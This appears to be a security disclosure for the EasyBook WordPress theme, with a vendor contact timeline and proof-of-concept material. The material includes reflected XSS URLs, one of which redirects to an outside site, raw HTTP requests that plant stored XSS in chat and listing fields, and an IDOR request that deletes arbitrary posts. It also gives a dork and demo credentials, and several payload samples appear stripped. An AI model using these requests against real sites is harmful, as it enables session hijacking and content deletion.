Multiple vulnerabilities was discovered in the ‘EasyBook – Directory & Listing WordPress Theme’, tested version — v1.2.1: - Unauthenticated Reflected XSS - Authenticated Persistent XSS - IDOR December 27th, 2019 - Envato Contacted January 6th, 2020 - Envato Investigating January ??th, 2020 - Theme has been removed from Envato January 8th, 2020 - v1.2.2 released January 10th, 2020 - Theme put back on Envato

PoC

-—[]- Info: -[]---- Demo website: https://www.easybook.cththemes.org/ Demo account: m0ze2/asdasd (login/password) PoC listing: https://www.easybook.cththemes.org/dashboard/#/listingsPending Google Dork: /wp-content/themes/easybook/ Date: 27/12/2019 -—[]- Reflected XSS: -[]---- Input field with placeholder «Hotel , City…» on the homepage is vulnerable. Same thing with a regular search (block under the «Add Listing» button). Payload Sample #0: Payload Sample #1: PoC #0: https://www.easybook.cththemes.org/?search_term=<img+src%3Dx+onerror%3Dalert(document.cookie)>&amp;checkin;=&amp;checkout;=&amp;adults;=1&amp;children;=0 PoC #1: https://www.easybook.cththemes.org/?search_term=<img+src%3Dx+onerror%3Dwindow.location%3D`https%3A%2F%2Fm0ze.ru`%3B>&amp;checkin;=&amp;checkout;=&amp;adults;=1&amp;children;=0 -—[]- Persistent XSS -> Chat: -[]---- Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website (from https://www.easybook.cththemes.org/dashboard/#/chats or from chat widget on the bottom right corner). Payload Sample #0: Payload Sample #1: PoC: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: www.easybook.cththemes.org User-Agent: Mozilla/5.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 144 Origin: https://www.easybook.cththemes.org DNT: 1 Connection: close Referer: https://www.easybook.cththemes.org/dashboard/ Cookie: your_cookies_here action=easybook_addons_chat_reply&_nonce=1c8cd14288&cid;=600&user;_id=XXX&touid;=1&reply;_text=payload Where: user_id=XXX (your unique WordPress ID); touid=1 (message receiver ID, in this example ID 1 == account «admin»); reply_text=payload (your payload). -—[]- Persistent XSS -> Listing page: -[]---- Add new listing here https://www.easybook.cththemes.org/dashboard/#/addListing (first time you need to order a «Free» plan and go to this URL again). Vulnerable input fields: «Address», «Longitude», «Latitude», «Fact Title» and «Fact Number». Payload Sample #0: "> Payload Sample #1: ">

Greetings from m0ze

Payload Sample #2: "> PoC: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: www.easybook.cththemes.org User-Agent: Mozilla/5.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------970149683563 Content-Length: 4142 Origin: https://www.easybook.cththemes.org DNT: 1 Connection: close Referer: https://www.easybook.cththemes.org/dashboard/ Cookie: your_cookies_here -----------------------------970149683563 Content-Disposition: form-data; name=“lid” 0 -----------------------------970149683563 Content-Disposition: form-data; name=“listing_type_id” 5058 -----------------------------970149683563 Content-Disposition: form-data; name=“isSubmit” true -----------------------------970149683563 Content-Disposition: form-data; name=“working_hours[timezone]” America/New_York -----------------------------970149683563 Content-Disposition: form-data; name=“working_hours[Monday][static]” enterHours -----------------------------970149683563 Content-Disposition: form-data; name=“working_hours[Tuesday][static]” enterHours -----------------------------970149683563 Content-Disposition: form-data; name=“working_hours[Wednesday][static]” enterHours -----------------------------970149683563 Content-Disposition: form-data; name=“working_hours[Thursday][static]” enterHours -----------------------------970149683563 Content-Disposition: form-data; name=“working_hours[Friday][static]” enterHours -----------------------------970149683563 Content-Disposition: form-data; name=“working_hours[Saturday][static]” enterHours -----------------------------970149683563 Content-Disposition: form-data; name=“working_hours[Sunday][static]” enterHours -----------------------------970149683563 Content-Disposition: form-data; name=“locations” US|M -----------------------------970149683563 Content-Disposition: form-data; name=“title” PoC -----------------------------970149683563 Content-Disposition: form-data; name=“address” "> -----------------------------970149683563 Content-Disposition: form-data; name=“longitude” "> -----------------------------970149683563 Content-Disposition: form-data; name=“latitude” "> -----------------------------970149683563 Content-Disposition: form-data; name=“author_email” M -----------------------------970149683563 Content-Disposition: form-data; name=“author_phone” M -----------------------------970149683563 Content-Disposition: form-data; name=“author_website” M -----------------------------970149683563 Content-Disposition: form-data; name=“content” "> -----------------------------970149683563 Content-Disposition: form-data; name=“features[0]” 303 -----------------------------970149683563 Content-Disposition: form-data; name=“features[1]” 300 -----------------------------970149683563 Content-Disposition: form-data; name=“features[2]” 305 -----------------------------970149683563 Content-Disposition: form-data; name=“features[3]” 302 -----------------------------970149683563 Content-Disposition: form-data; name=“facts[0][title]” “> -----------------------------970149683563 Content-Disposition: form-data; name=“facts[0][number]” “> -----------------------------970149683563 Content-Disposition: form-data; name=“facts[0][icon]” 123 -----------------------------970149683563 Content-Disposition: form-data; name=“lservices[0][service_id]” -imgsrcxonerroralert12 -----------------------------970149683563 Content-Disposition: form-data; name=“lservices[0][service_name]” M -----------------------------970149683563 Content-Disposition: form-data; name=“lservices[0][service_desc]” M -----------------------------970149683563 Content-Disposition: form-data; name=“lservices[0][service_price]” 0 -----------------------------970149683563 Content-Disposition: form-data; name=“action” submit_listing -----------------------------970149683563 Content-Disposition: form-data; name=”_wpnonce” 1c8cd14288 -----------------------------970149683563-- -—[]- IDOR: -[]---- Delete any post/page/listing: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: www.easybook.cththemes.org User-Agent: Mozilla/5.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 64 Origin: https://www.easybook.cththemes.org DNT: 1 Connection: close Referer: https://www.easybook.cththemes.org/dashboard/ Cookie: your_cookies_here action=easybook_addons_delete_listing&_nonce=1c8cd14288&lid;=XXXX Where: lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for tag).